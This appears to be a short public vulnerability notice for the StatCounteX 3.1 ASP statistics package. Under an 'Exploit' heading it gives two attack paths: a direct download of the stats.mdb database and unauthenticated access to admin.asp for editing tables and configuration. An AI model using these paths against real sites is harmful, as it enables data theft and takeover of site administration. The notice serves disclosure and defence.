1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 |
# Software Link: http://www.2enetworx.com/dev/projects/download.asp?pid=4&rid=34 # Version: 3.1 # Tested on: Windows xp sp3 ------------------------------------------------------ ______ |__ \| | | |__) | |__ ___ _ __ ____ __ ___ |___/| '_ \ / _ \ '_ \ / _/\| '_ ` _ \ | || | | |__/ | | | (_) | | | | | | |_||_| |_|\___|_| |_|\/__/|_| |_| |_| ------------------------------------------------------ ###########StatCounteX 3.1 Multiple Vulnerabilities############ # # Author : Phenom # # app version : 3.1 # ################################################################################# ####### Exploit ################################################################# # #1 - Database Disclosure Vulnerability # #http://site.com/path/stats.mdb # #2 - Remote Admin Access Vulnerability # #http://site.com/path/admin.asp # #here you can edit tables and configuration # ################################################################################# |